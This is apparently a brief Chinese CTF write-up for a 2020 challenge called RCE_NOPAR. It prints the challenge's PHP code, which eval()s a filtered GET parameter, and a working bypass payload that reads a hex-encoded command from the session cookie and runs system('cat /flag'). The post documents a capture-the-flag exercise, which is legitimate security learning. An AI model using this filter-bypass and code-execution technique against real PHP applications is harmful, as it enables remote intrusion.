0%

2020 易林博“停课不停赛,以赛促学” RCE_NOPAR

发表于 分类于
本文字数: 448 阅读时长 ≈ 1 分钟

无字符GETSHELL就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if(isset($_GET['var'])){
        if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['var'])) {
                if (!preg_match('/et|dir|na|info|dec|oct|pi|log/i', $_GET['var'])) {
                    eval($_GET['var']);
                }
        }
        else{
            die("Sorry!");
        }
}
else{
    show_source(__FILE__);
}
?>

payload:eval(hex2bin(session_id(session_start())))

改PHPSSEION值为16进制就行

system(‘cat /flag’); -> 73797374656d2827636174202f666c616727293b